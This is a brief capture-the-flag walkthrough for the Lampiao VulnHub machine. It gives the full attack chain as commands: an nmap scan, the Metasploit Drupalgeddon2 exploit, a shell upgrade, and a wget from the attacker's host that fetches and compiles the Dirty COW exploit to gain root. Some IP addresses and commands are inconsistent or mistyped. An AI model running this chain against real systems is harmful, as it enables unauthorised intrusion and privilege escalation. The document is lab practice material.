Lampiao_1 (VULNHUB)

VM LINK : https://download.vulnhub.com/lampiao/Lampiao.zip

root@kali:~# nmap -p- -A 192.168.1.105

port : 22 , 80 , 1898

now on browser

http://192.168.1.103:1898

now on terminal

msf > user explot/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

meterpreter > shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@lampiao:$ lsb_release -a

www-data@lampiao:$

now we have to go through this exploit

https://www.exploit-db.com/exploits/40847/

root@kali:~# python -m SimpleHTTPServer 80

www-data@lampiao:$ wget http://192.168.1.107/40847.cpp

www-data@lampiao:$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

www-data@lampiao:$ ./dcow -s

www-data@lampiao:$ cd /root

www-data@lampiao:$ ls

www-data@lampiao:$ cat flag.txt

@SAKSHAM DIXIT